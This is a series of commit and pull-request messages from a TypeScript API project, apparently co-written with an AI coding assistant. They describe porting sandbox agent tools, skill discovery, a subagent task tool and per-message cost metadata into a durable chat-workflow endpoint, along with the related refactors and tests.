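  if (typeof value !== "object" || value === null) return false;
  const sandbox = (value as { sandbox?: unknown }).sandbox;
  if (typeof sandbox !== "object" || sandbox === null) return false;
  const { state, workingDirectory } = sandbox as {
    state?: unknown;
    workingDirectory?: unknown;
  };
  return (
    typeof state === "object" &&
    state !== null &&
    typeof workingDirectory === "string" &&
    workingDirectory.length > 0
  );
}
```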

Tests updated for the new shape. 25 tests in touched files green
(8 isAgentContext + 4 getSandbox + 7 bashTool + 4 buildRecoupExecEnv +
2 factory). Full suite 2980/2980 pass; lint clean; production build
succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat): extract CHAT_AGENT_STOP_WHEN, shared by /api/chat + /api/chat/workflow

Per discussion on PR #583. Restoring the streamText stop condition so
the workflow agent gets the model wrap-up turn after a tool call (model
→ tool → tool-result → model → text response), instead of stopping at
streamText's default `stepCountIs(1)` after the first tool call.

DRY by sharing one constant between the two chat endpoints:

- New: `CHAT_AGENT_STOP_WHEN = stepCountIs(111)` in lib/chat/const.ts.
  Inherits the value that /api/chat already uses (originally hardcoded
  in getGeneralAgent.ts:55) — high enough that normal flows never hit
  the cap but bounds runaway loops for cost / replay safety.
- lib/agents/generalAgent/getGeneralAgent.ts: imports the constant
  instead of constructing stepCountIs(111) inline.
- app/lib/workflows/runAgentStep.ts: imports the constant, passes to
  streamText as `stopWhen`.

Single-shot agents (createCompactAgent, createContentPromptAgent,
createEmailReplyAgent) intentionally keep their local `stepCountIs(1)`
— they're not in the multi-step chat family.

Full suite 2980/2980 pass; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): port 7 leaf sandbox tools — read/write/edit/grep… (#585)

* feat(chat-workflow): port 7 leaf sandbox tools — read/write/edit/grep/glob/todo/web_fetch (PR 5)

Builds on PR 4 (bash + wire-up) by porting the remaining leaf tools
from open-agents/packages/agent/tools/. Each is a direct port adapted
to api's Sandbox interface, registered in buildAgentTools, and ready
for the agent to invoke through the existing experimental_context
plumbing.

New tool files (one tool per file, per sweetman SRP):
- readFileTool.ts — read with 1-indexed offset/limit, numbered output
- writeFileTool.ts — create / overwrite (with mkdir -p) on sandbox.writeFile
- editFileTool.ts — exact-string replace, ambiguous-match rejection
- grepTool.ts — POSIX ERE search via `grep -rn`, capped at 100/10/200
- globTool.ts — find -printf with mtime sort, GNU/BSD-compatible
- todoWriteTool.ts — stateless planning surface; echoes the list back
- webFetchTool.ts — curl from inside the sandbox, body truncated at 10KB
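
As an illustration of the "1-indexed offset/limit, numbered output" behavior of the read tool, a possible formatter is sketched below. The function name, the `N: line` output format and the default limit are assumptions, not the ported tool's actual format.

```typescript
// Return `limit` lines starting at 1-indexed `offset`, each prefixed with
// its original line number. Format and defaults are assumed.
function formatNumberedLines(content: string, offset = 1, limit = 2000): string {
  const lines = content.split("\n");
  const start = Math.max(offset, 1) - 1; // convert to a 0-indexed start
  return lines
    .slice(start, start + limit)
    .map((line, i) => `${start + i + 1}: ${line}`)
    .join("\n");
}
```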

New helpers (utilities used by multiple tools):
- shellEscape.ts — `'` → `'\''` dance
- toDisplayPath.ts — absolute → relative-when-inside-workdir display path
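
The quote-escaping step can be sketched as follows. Wrapping the whole value in single quotes is an assumption about the helper; the `'` → `'\''` replacement is the part named above.

```typescript
// Wrap a value in single quotes for POSIX shells. Each embedded single
// quote closes the string, emits an escaped quote, and reopens the string.
function shellEscape(value: string): string {
  return `'${value.replace(/'/g, `'\\''`)}'`;
}
```

With this shape, the shell reads the escaped value back as one literal argument, with no expansion of `$`, backticks or spaces.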

buildAgentTools registers all 8 leaf tools (bash + 7 new). The composite
tools (`task`, `ask_user_question`, `skill`) need subagent context /
UI rendering / skill discovery infrastructure not in api today and
land in a follow-up PR.

Tests: 50 new across the 7 tools + 2 helpers + factory. Full suite
3014/3014; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(agent-tools): harmonize tool exports as direct values (drop factory wrappers)

Per PR 585 review question — most tools were defined as `() => tool({...})`
factories while two (todoWriteTool, webFetchTool) were direct values.
The split was a vestigial copy from open-agents where the factory
pattern only made sense for tools that took options (originally bash's
ToolOptions, which sweetman had me remove in PR 4 review).

AI SDK's `tool()` helper returns a plain value with no per-call state,
so the factory wrappers added nothing. Harmonized to direct-value
exports across all 8 tools:

- bashTool, readFileTool, writeFileTool, editFileTool, grepTool,
  globTool: dropped the `() =>` wrapper.
- buildAgentTools.ts: dropped the matching `()` calls.
- 6 test files: dropped `const tool = xTool();` calls (use `xTool` directly).

Full suite 3014/3014 pass; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): port skill discovery + skillTool (PR 6, slim) (#587)

* feat(chat-workflow): port skill discovery + skillTool (PR 6, slim)

Ports the `skill` composite tool from open-agents along with the skill
discovery layer it depends on. The handler now connects to the sandbox
before workflow start, scans `${workingDirectory}/skills/` for project-
level skills, and threads the catalog into the workflow via
`AgentContext.skills`. The `skill` tool is registered in
`buildAgentTools` only when the catalog is non-empty — so models in
sandboxes without skills never see the tool.

New skills layer (lib/skills/):
- skillTypes.ts — SkillMetadata, SkillOptions, skillFrontmatterSchema,
  frontmatterToOptions (Zod schema + camelCase normalization)
- parseSkillFrontmatter.ts — hand-rolled YAML subset parser
  (key:value, quoted strings, booleans; preserves colons in URLs)
- extractSkillBody.ts — strip frontmatter, return body
- substituteArguments.ts — $ARGUMENTS replacement
- injectSkillDirectory.ts — prepend `Skill directory: <path>`
- discoverSkills.ts — scan dirs, parse frontmatter, dedupe by name,
  drop names that shadow built-in /model /resume /new
- getSandboxSkillDirectories.ts — slim: `[${workingDirectory}/skills]`
  only. Global skills (~/.skills) port later alongside short-lived
  token minting

New tool: lib/agent/tools/skillTool.ts — case-insensitive lookup,
respects `disable-model-invocation`, surfaces available-skills list
on unknown name. Loads SKILL.md content, applies extractSkillBody →
injectSkillDirectory → substituteArguments, returns to the model.
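
A minimal sketch of that three-step body pipeline, assuming `---`-delimited frontmatter. The regex, the blank line after the directory header and the `renderSkill` wrapper are illustrative; only the helper names, their order and the `Skill directory: <path>` prefix come from this commit.

```typescript
// Frontmatter is assumed to be a leading block delimited by "---" lines.
const FRONTMATTER = /^---\r?\n[\s\S]*?\r?\n---\r?\n?/;

// Strip the frontmatter block, return the remaining body.
function extractSkillBody(content: string): string {
  return content.replace(FRONTMATTER, "").trim();
}

// Prepend the skill's directory so relative paths in the body resolve.
function injectSkillDirectory(body: string, skillDir: string): string {
  return `Skill directory: ${skillDir}\n\n${body}`;
}

// Replace every $ARGUMENTS occurrence. split/join avoids the special
// "$" replacement patterns of String.prototype.replace.
function substituteArguments(body: string, args: string = ""): string {
  return body.split("$ARGUMENTS").join(args);
}

// Hypothetical wrapper applying the steps in the order named above.
function renderSkill(content: string, skillDir: string, args: string): string {
  return substituteArguments(
    injectSkillDirectory(extractSkillBody(content), skillDir),
    args,
  );
}
```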

Wire-up:
- AgentContext gains `skills?: SkillMetadata[]`
- buildAgentTools accepts `{ skills }`, registers skill tool when
  non-empty
- runAgentStep passes `agentContext.skills` to buildAgentTools
- handleChatWorkflowStream connects sandbox + discoverSkills before
  start(workflow); empty catalog on discovery failure (best-effort,
  never blocks the request)

Slim scope decisions:
- Project skills only (no global ~/.skills/ scan yet)
- No short-lived token minting; the recoup-api skill would still
  load + return content, but its curl examples wouldn't authenticate
  without ad-hoc credentials. Token minting becomes a separate PR
  where it can be designed properly (Privy JWT vs server-minted JWT
  scoped to accountId + sandbox session).

Tests: 35 new (4 extractSkillBody + 4 substituteArguments + 2
injectSkillDirectory + 7 parseSkillFrontmatter + 9 discoverSkills +
7 skillTool + 4 buildAgentTools updated). Full suite 3049/3049 pass;
lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(skills): match open-agents 3-path scan (was scanning the wrong dir)

The slim getSandboxSkillDirectories looked at ${workingDirectory}/skills/
— a path that doesn't exist in real recoupable sandboxes. The actual
layout (mirrored from open-agents/apps/web/lib/skills/directories.ts):

  - ${workingDirectory}/.claude/skills/   (project, claude-style)
  - ${workingDirectory}/.agents/skills/   (project, agents-style)
  - ${HOME}/.agents/skills/               (global; populated at
                                           provisioning by
                                           installSessionGlobalSkills)

Also drops the earlier deferral comment: global skills load fine
WITHOUT short-lived token minting. The skill tool returns SKILL.md
content to the model; only the curl examples *inside* SKILL.md need
auth credentials, and those can be supplied ad-hoc until proper
token minting lands.

Changes:
- getSandboxSkillDirectories now async (uses resolveSandboxHomeDirectory
  to find the sandbox's actual $HOME — defaults to /root)
- exports the two sub-functions (getProjectSkillDirectories +
  getGlobalSkillsDirectory) so they're individually testable
- Handler awaits the async path resolution
- New test suite covers all 3 paths + $HOME variants

Caught by sweetman pointing out that this same repo (org-rostrum-pacific)
DOES show skills in open-agents — proving the slim deferral was wrong.

Full suite 3053/3053; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(skills): YAGNI project-dir scan + extract getSkills (per PR 587 feedback)

Two changes per user direction:

1. **YAGNI: drop project-skill directory scanning.** All skills are
   provisioned globally via `installSessionGlobalSkills` at sandbox
   startup — org repos do NOT bundle their own skill directories.
   getSandboxSkillDirectories now returns just the single global
   path: `${HOME}/.agents/skills`. Deleted getProjectSkillDirectories
   and the PROJECT_SKILL_BASE_FOLDERS array.

2. **SRP: extract getSkills into its own file.** Previously inline in
   skillTool.ts (per sweetman comment on PR 587). Now lives at
   lib/skills/getSkills.ts with its own tests. Future skill-aware
   consumers (e.g. system-prompt builders) share the same accessor
   instead of duplicating the context-cast.

Verified live on preview against `recoupable/org-rostrum-pacific-...`
BEFORE this commit:
  - Sandbox provisioning installs 2 globals at
    /home/vercel-sandbox/.agents/skills/ (recoup-api + artist-workspace)
  - Agent invoked `skill({ skill: "recoup-api" })` successfully,
    received 11,173 chars of SKILL.md content with the correct
    "Skill directory: /home/vercel-sandbox/.agents/skills/recoup-api"
    header

Full suite 3055/3055; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(skills): SRP — extract findSkillFile + getGlobalSkillsDirectory

Per sweetman PR review (comments r3283710486 and r3283762023). Each
helper now lives in its own file with its own focused test suite:

- lib/skills/findSkillFile.ts — was inlined in discoverSkills.ts
  - 3 new unit tests (prefer SKILL.md, fall back to skill.md, null
    when neither exists)
- lib/skills/getGlobalSkillsDirectory.ts — was inlined in
  getSandboxSkillDirectories.ts
  - 2 new unit tests (standard path, trailing-slash tolerance)

discoverSkills now imports findSkillFile. getSandboxSkillDirectories
imports getGlobalSkillsDirectory. The old getSandboxSkillDirectories
test loses its inline getGlobalSkillsDirectory cases (those moved to
the dedicated test file).

Full suite passes; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): port task + ask_user_question composite tools (PR 7) (#589)

* feat(chat-workflow): port task + ask_user_question composite tools (PR 7)

Completes the open-agents tool surface. The agent now has all 11 tools.

**ask_user_question** (lib/agent/tools/askUserQuestionTool.ts) —
client-side tool with NO server execute. Schema mirrors open-agents
verbatim (questions array, options with label/description, multiSelect
flag, max 12-char header). streamText halts after emitting the tool-
call because there's no result to feed back; the chat UI renders the
question component, collects answers, and submits them in the next
workflow request's messages array. No WDK pause/resume hook needed.

**task** (lib/agent/tools/taskTool.ts) — slim port of open-agents'
multi-type SUBAGENT_REGISTRY → one generic subagent. Runs a sub-
`streamText` loop with a curated subagent tool set (`read, write,
edit, grep, glob, bash`) matching open-agents' `executor` subagent.

The subagent tool set deliberately EXCLUDES:
- task (recursion guard — open-agents' three subagent types
  executor/explorer/design all explicitly omit task too; subagents
  are leaves of the agent tree)
- ask_user_question, skill, todo_write, web_fetch (parity with
  open-agents subagent curation; subagents run autonomously, don't
  plan from scratch, don't make web calls, don't load further skills)

AgentContext gains `modelId?: string` so the subagent can use the
same model as its parent. Handler populates it from chat.model_id
or the platform default.

buildAgentTools registers both new tools unconditionally (skill stays
conditional on a non-empty catalog).

Quirk: api's AI SDK (6.0.0-beta.122) calls toModelOutput(output)
directly, NOT toModelOutput({ output }) as open-agents' newer 6.0.165
does. askUserQuestionTool uses the direct signature.

Tests: 9 askUserQuestionTool + 6 taskTool + updated buildAgentTools
+ AgentContext updates. Full suite 3075/3075 pass, lint clean,
production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(task-tool): provide non-empty subagent prompt

The subagent's streamText was invoked with messages: [] and only a
system prompt, so the AI SDK recorded zero steps and threw
NoOutputGeneratedError — surfaced to the parent as "Subagent failed:
No output generated. Check the stream for errors."

Pass an explicit user-side trigger prompt, mirroring open-agents'
task tool. Adds a regression test that asserts streamText receives
either a non-empty prompt or non-empty messages.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(task-tool): extract buildSubagentTools (SRP) + drop modelId from AgentContext (KISS)

Address PR review feedback:

- SRP: move buildSubagentTools to lib/agent/tools/buildSubagentTools.ts
  (one exported function per file).
- KISS: open-agents' AgentContext type does not have modelId — it uses
  model: LanguageModel / subagentModel?: LanguageModel. api can't follow
  that exact shape because agentContext is part of a durable Vercel
  Workflow input and LanguageModel objects aren't JSON-serializable.
  Instead of inventing modelId on AgentContext, hardcode a default
  subagent model id in taskTool. A subagentModelId override field can
  be added if/when a real consumer needs it.

Also format-fixes askUserQuestionTool.ts toModelOutput arrow
(parentheses around single param flagged by prettier in CI).

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(agent): align AgentContext + model resolution with open-agents

Match open-agents' `tools/utils.ts` + `types.ts` shape so the subagent
inherits the parent's model (rather than the previous hardcoded
SUBAGENT_MODEL_ID):

- AgentContext gains `model: LanguageModel` (required) and
  `subagentModel?: LanguageModel`, mirroring open-agents.
- Introduce DurableAgentContext = Omit<AgentContext, "model" | "subagentModel">
  for the workflow input shape, since LanguageModel instances aren't
  JSON-serializable and can't ride durable Vercel Workflow inputs.
- runAgentStep constructs `callModel = gateway(input.modelId)` once
  per step and merges it into experimental_context — same pattern as
  open-agents' prepareCall in open-harness-agent.ts.
- New getMainModel / getSubagentModel helpers (SRP, one per file)
  mirror open-agents' utility functions: getSubagentModel returns
  `ctx.subagentModel ?? ctx.model`.
- taskTool drops the hardcoded SUBAGENT_MODEL_ID; calls
  getSubagentModel(experimental_context, "task") instead — subagent
  now defaults to the same model the parent is running.
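
The context split and model fallback above can be sketched as follows. This is a minimal illustration, not the repo's code: `LanguageModel` is stubbed as a local interface (the real type comes from the AI SDK), the `sandbox` field and the `hydrateContext` helper are hypothetical, and the real `getSubagentModel` takes a second argument that is omitted here. Only the `Omit` shape and the `??` fallback come from the commit message.

```typescript
// Stand-in for the AI SDK's LanguageModel, stubbed so the sketch is self-contained.
interface LanguageModel {
  modelId: string;
}

// Assumed minimal context shape; the real AgentContext carries more fields.
interface AgentContext {
  sandbox: { workingDirectory: string };
  model: LanguageModel;
  subagentModel?: LanguageModel;
}

// JSON-serializable subset that can ride a durable workflow input.
type DurableAgentContext = Omit<AgentContext, "model" | "subagentModel">;

// Subagents inherit the parent's model unless an override is present.
function getSubagentModel(ctx: AgentContext): LanguageModel {
  return ctx.subagentModel ?? ctx.model;
}

// Hypothetical helper: rebuild the full context inside a step from the
// durable part plus a freshly constructed model object.
function hydrateContext(
  durable: DurableAgentContext,
  model: LanguageModel,
): AgentContext {
  return { ...durable, model };
}
```

Keeping the model out of the durable type means the workflow input stays plain JSON, while each step pays only the cost of constructing the model object once.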

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): emit per-message cost/usage metadata (cutover Bundle C) (#592)

* feat(chat-workflow): emit per-message cost/usage metadata (Bundle C)

First step in the open-agents → api cutover sequence. Adds a
messageMetadata callback to runAgentStep's toUIMessageStream call so
the UI receives {modelId, lastStepUsage, totalMessageUsage,
lastStepCost, totalMessageCost, stepFinishReasons} on every assistant
turn — matching open-agents' WebAgentMessageMetadata shape byte-for-byte
so sandbox.recoupable.com's model/cost badges keep working when cut
over to /api/chat/workflow.

New (SRP, one function per file):
- lib/agent/messageMetadata/extractGatewayCost.ts — port of
  open-agents' gateway-metadata.ts, parses gateway-reported per-step
  cost from providerMetadata.
- lib/agent/messageMetadata/addLanguageModelUsage.ts — port of
  open-agents' usage.ts, pointwise-sums LanguageModelUsage records.
- lib/agent/messageMetadata/AgentMessageMetadata.ts — type mirroring
  open-agents' WebAgentMessageMetadata.
- lib/agent/messageMetadata/buildMessageMetadataCallback.ts —
  stateful factory returning a fresh callback per turn; accumulates
  usage + cost across finish-step parts.
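
A rough sketch of the stateful-factory idea behind buildMessageMetadataCallback, under simplifying assumptions: the `Usage` record is reduced to three required numeric fields, the `StreamPart` union is a hypothetical stand-in for the SDK's stream parts, and cost tracking is left out. The metadata field names (`lastStepUsage`, `totalMessageUsage`, `stepFinishReasons`) are the ones listed in the commit message.

```typescript
// Simplified usage record; the SDK's LanguageModelUsage has more (optional) fields.
interface Usage {
  inputTokens: number;
  outputTokens: number;
  totalTokens: number;
}

// Hypothetical stand-in for the stream parts the callback would see.
type StreamPart =
  | { type: "finish-step"; usage: Usage; finishReason: string }
  | { type: "text-delta"; text: string };

interface MessageMetadata {
  lastStepUsage: Usage;
  totalMessageUsage: Usage;
  stepFinishReasons: string[];
}

// Pointwise sum of two usage records.
function addUsage(a: Usage, b: Usage): Usage {
  return {
    inputTokens: a.inputTokens + b.inputTokens,
    outputTokens: a.outputTokens + b.outputTokens,
    totalTokens: a.totalTokens + b.totalTokens,
  };
}

// Returns a fresh callback per turn; state lives in the closure, so two
// turns never share accumulated totals.
function buildMetadataCallback(): (part: StreamPart) => MessageMetadata | undefined {
  let total: Usage | undefined;
  const reasons: string[] = [];
  return (part) => {
    if (part.type !== "finish-step") return undefined;
    const next = total ? addUsage(total, part.usage) : part.usage;
    total = next;
    reasons.push(part.finishReason);
    return {
      lastStepUsage: part.usage,
      totalMessageUsage: next,
      stepFinishReasons: [...reasons],
    };
  };
}
```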

Wired into app/lib/workflows/runAgentStep.ts. PROGRESS notes called
this out as a known gap from the original workflow port (PR 4).

Tests: 19 new (6 + 4 + 6 + 3); full suite 3096/3096 pass; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(message-metadata): SRP extractions + upgrade ai SDK; drop normalizeUsage

Address PR review feedback (one exported function per file) and adopt
the user's preferred path of upgrading api's `ai` package rather than
maintaining a normalization shim:

- Extract addTokenCounts.ts (used by addLanguageModelUsage)
- Extract hasGatewayShape.ts + GatewayProviderMetadata.ts (used by
  extractGatewayCost)
- Split AgentStepFinishMetadata into its own file (was co-located
  in AgentMessageMetadata)

Upgrade the AI SDK so the wire format matches open-agents natively:
- ai: 6.0.0-beta.122 → ^6.0.190
- @ai-sdk/anthropic, @ai-sdk/gateway, @ai-sdk/google, @ai-sdk/openai,
  @ai-sdk/mcp: all bumped to latest stable

The new SDK's LanguageModelUsage is the flat shape (top-level
`inputTokens` number + nested `inputTokenDetails`) — identical to
open-agents' wire format. No conversion needed, so:
- Delete normalizeUsage.ts + test (net -82 LOC)
- Delete AgentLanguageModelUsage type (use SDK's LanguageModelUsage
  directly)

Production code changes for the SDK upgrade:
- runAgentStep + setupChatRequest: await convertToModelMessages
  (now returns Promise<ModelMessage[]>)

Tests: 3106/3106 pass; production typecheck clean; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(task-tool): live subagent progress + transcript (Cutover Bundle B) (#594)

Convert taskTool.execute from `async () =>` to `async function*`,
mirroring open-agents' `packages/agent/tools/task.ts`. Yields multiple
chunks during the subagent run so the chat UI can render:

  - An initial "Subagent · 0 tools · 0 tokens" card with stable
    startedAt timestamp
  - A live `pending: {name, input}` indicator for each tool-call
  - Accumulated `usage` after each finish-step
  - A final `{final: ModelMessage[], ...}` chunk containing the full
    subagent transcript for expandable rendering

`toModelOutput` mirrors open-agents' implementation: extracts the
last assistant text part from `output.final` for inclusion in the
parent agent's context.
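
To illustrate the generator shape and the `toModelOutput` extraction described above, here is a simplified sketch. The `Message`, `TaskChunk`, and `SubagentEvent` types are hypothetical reductions of the real SDK types, and the event source is modeled as a plain `AsyncIterable` rather than a `streamText` result; usage accumulation is omitted.

```typescript
interface TextPart { type: "text"; text: string }
interface ToolCallPart { type: "tool-call"; toolName: string }

// Reduced message shape; the SDK's ModelMessage is richer.
interface Message {
  role: "user" | "assistant" | "tool";
  content: string | Array<TextPart | ToolCallPart>;
}

interface TaskChunk {
  startedAt: number;
  toolCallCount: number;
  pending?: { name: string; input: unknown };
  final?: Message[];
}

// Hypothetical event stream emitted by the subagent run.
type SubagentEvent =
  | { type: "tool-call"; name: string; input: unknown }
  | { type: "done"; messages: Message[] };

// Yields an initial empty card, one chunk per tool call, then the transcript.
async function* runTask(
  events: AsyncIterable<SubagentEvent>,
  startedAt: number,
): AsyncGenerator<TaskChunk> {
  let toolCallCount = 0;
  yield { startedAt, toolCallCount };
  for await (const event of events) {
    if (event.type === "tool-call") {
      toolCallCount += 1;
      yield { startedAt, toolCallCount, pending: { name: event.name, input: event.input } };
    } else {
      yield { startedAt, toolCallCount, final: event.messages };
    }
  }
}

// Picks the last text part of the last assistant message, which is what
// the parent agent would see as the subagent's answer.
function lastAssistantText(messages: Message[]): string | undefined {
  for (const message of [...messages].reverse()) {
    if (message.role !== "assistant") continue;
    if (typeof message.content === "string") return message.content;
    for (const part of [...message.content].reverse()) {
      if (part.type === "text") return part.text;
    }
  }
  return undefined;
}
```

Because `startedAt` is passed in once and repeated on every chunk, the UI can treat each chunk as a full replacement of the previous card state.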

New (SRP, one function per file):
- lib/agent/messageMetadata/sumLanguageModelUsage.ts — wraps
  addLanguageModelUsage to handle undefined inputs without
  introducing zero-tokens placeholders.

Drive-by fix: askUserQuestionTool's `toModelOutput` signature was
`(output) =>` from the older beta SDK era. The current SDK
(ai@^6.0.190) passes `({ toolCallId, input, output })`. Updated to
`({ output }) =>` so the function actually receives the user's
answers at runtime — was previously falling through to the generic
"User responded to questions." path. Tests updated to match.

Tests: 25 new/updated (12 taskTool + 4 sumLanguageModelUsage + 9
askUserQuestion); full suite 3114/3114 pass; lint clean.

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
sweetmantech added a commit to recoupable/api that referenced this pull request May 22, 2026
* feat(chat-workflow): POST /api/chat/workflow route stub (PR 2 of 5) (#579)

* feat(chat-workflow): add POST /api/chat/workflow route stub

Adds the route stub for the new sandbox-driven, Vercel-Workflow-backed
chat endpoint documented in recoupable/docs#221. The stub validates
the full request contract (auth, body, session/chat ownership,
sandbox active) and returns a hardcoded UIMessage stream with an
x-workflow-run-id: stub-<uuid> header — so the chat-side team can
integrate against the real response shape today while the workflow
itself is being ported from open-agents in follow-up PRs.

Files:
- app/api/chat/workflow/route.ts — thin POST shim + OPTIONS for CORS
- lib/chat/handleChatWorkflowStream.ts — auth → validate → session/chat
  ownership → sandbox check → stub UIMessage stream
- lib/chat/validateChatWorkflowBody.ts — Zod schema matching the OpenAPI
  ChatWorkflowRequest (messages, chatId, sessionId, optional
  context.contextLimit)

Status codes implemented (match contract docs):
- 200 — UIMessage stream + x-workflow-run-id header
- 400 — invalid JSON / invalid body / "Sandbox not initialized"
- 401 — validateAuthContext passthrough
- 403 — session not owned by API key's account
- 404 — session or chat not found (incl. chat under different session)
- 500 — selectSessions returned null (DB error)

409 (duplicate workflow run for chat) is deferred to the wire-up PR
that adds compareAndSetChatActiveStreamId — no workflow to dedupe yet.

Tests (TDD red→green): 23 new tests, all green; full suite 2901 pass.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): address PR review — SRP/DRY cleanup

Two review fixes per PR feedback:

1. SRP/DRY — drop the local errorResponse helper from
   handleChatWorkflowStream.ts; use the shared
   lib/networking/errorResponse and lib/zod/validationErrorResponse
   helpers instead.

2. SRP — move auth + body parsing out of handleChatWorkflowStream.ts
   into the validator. Rename validateChatWorkflowBody → validateChatWorkflow
   so it accepts a full NextRequest (like the existing validateChatRequest)
   and returns an auth-augmented body (accountId/orgId/authToken). The
   handler now opens with a single `validateChatWorkflow(request)` call.

Tests reshaped to match new seams:
- Validator test mocks validateAuthContext only
- Handler test mocks validateChatWorkflow (the new seam)
- Old "400 invalid JSON" + "400 missing chatId" handler tests collapsed
  into a single "validator short-circuit passes through" test — both are
  now the validator's responsibility, not the handler's

22/22 new tests green; full suite 2900/2900 pass; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* chore: revert unrelated local changes accidentally swept into PR

Previous commit (9262f65) used `git add -A` which picked up local
Supabase CLI artifacts (supabase/.temp/) and a local .gitignore tweak
that aren't part of this PR's scope. Removing them now so the PR
diff stays scoped to the chat-workflow refactor.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): wire POST /api/chat/workflow to durable Vercel Workflow (PR 3 of 4) (#581)

* feat(chat-workflow): wire POST /api/chat/workflow to durable Vercel Workflow

Replaces the stub UIMessage stream in PR #579 with a real Vercel Workflow
agent loop. Stub run-ids (`stub-<uuid>`) are replaced with real ones
(`wrun_<id>`) emitted by the workflow runtime. Tools are still NOT wired —
the workflow runs streamText with the gateway model + Recoup custom
instructions only. Sandbox tool surface comes in a follow-up PR.

What's now plumbed end-to-end:
- validateChatWorkflow → session+chat ownership → sandbox active → reconcile
  existing active_stream_id (resume / 409 / fall-through) → refresh
  lifecycle activity → fire-and-forget persist user message → start
  runAgentWorkflow → CAS active_stream_id (cancel + 409 on race) →
  return run.getReadable() with x-workflow-run-id header

New helpers (Supabase):
- compareAndSetChatActiveStreamId — atomic CAS on chats.active_stream_id
- touchChat — bump chats.updated_at
- updateChat — generic partial update mirroring updateSession's shape
- createChatMessageIfNotExists — INSERT ... ON CONFLICT DO NOTHING via upsert
- isFirstChatMessage — true iff exactly one row exists matching messageId

New helpers (chat/recoupable):
- extractOrgId — `org-<slug>-<uuid>` → uuid (lowercased)
- agentCustomInstructions — assistantFileLinkPrompt + recoupApiSkillPrompt
- persistLatestUserMessage — fire-and-forget user msg + title-from-first-80
- reconcileExistingActiveStream — 3-attempt resume/clear/conflict loop
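
As an illustration of the extractOrgId mapping (`org-<slug>-<uuid>` to a lowercased uuid), a minimal sketch follows. The exact input format is an assumption: this version accepts any string whose final path segment looks like `org-<slug>-<uuid>`, optionally followed by `.git`, and returns `null` otherwise. The URL in the usage note is made up.

```typescript
// Matches a trailing "org-<slug>-<uuid>" segment, with an optional ".git" suffix.
const ORG_REPO_PATTERN =
  /org-[a-z0-9-]+-([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})(?:\.git)?\/?$/i;

// Returns the lowercased uuid, or null when the input is not an org repo.
function extractOrgId(cloneUrl: string | null | undefined): string | null {
  if (!cloneUrl) return null;
  const match = ORG_REPO_PATTERN.exec(cloneUrl.trim());
  return match ? match[1].toLowerCase() : null;
}
```

For a hypothetical clone URL ending in `org-acme-1B2C3D4E-AAAA-BBBB-CCCC-1234567890AB.git`, this returns `1b2c3d4e-aaaa-bbbb-cccc-1234567890ab`.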

New workflow files:
- app/workflows/runAgentWorkflow.ts — `"use workflow"`, agent loop wrapper
- app/workflows/runAgentStep.ts — `"use step"`, single streamText turn

Tests: 46 new (8 extractOrgId + 5 CAS + 3 touchChat + 2 updateChat + 3
createChatMessageIfNotExists + 5 isFirstChatMessage + 7 persistLatest +
6 reconcileExistingActiveStream + 18 handler-wire-up tests refactored).
Full suite: 2946/2946 pass, lint clean.

Out of scope (next PR): sandbox tool ports (10 files + buildAgentTools).
Without tools, `finishReason` is always "stop" after one turn — the
runAgentWorkflow loop shape is in place but only iterates once today.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): address PR review — structural + P1/P2 fixes

Sweetman structural feedback (KISS / OCP):
- Move workflow files: app/workflows/runAgent{Workflow,Step}.ts →
  app/lib/workflows/runAgent{Workflow,Step}.ts
- Generic Supabase helpers + domain wrappers:
  - Generic `updateChat({filter, updates})` with optional CAS predicate
    on active_stream_id. Subsumes compareAndSetChatActiveStreamId and
    touchChat (both deleted).
  - Generic `selectChatMessages({chatId, orderBy, limit, ...})` replaces
    domain-specific isFirstChatMessage. The "is earliest?" check now
    lives in persistLatestUserMessage where it belongs.
  - Rename createChatMessageIfNotExists → `upsertChatMessage` with a
    discriminated `{ok, row, isDuplicate} | {ok:false, error}` result so
    callers can tell duplicates from DB errors.
- Extract resume-stream block from handler into `maybeResumeChatStream.ts`
  (OCP — handler stays small, resume logic grows independently).

cubic P1 fixes:
- CAS-before-start: handler now claims `active_stream_id` with a
  `pending-<uuid>` placeholder BEFORE calling start(workflow). Closes the
  race where two requests could both bill the model before one lost the
  CAS. After start(), promotes the placeholder to the real run id.
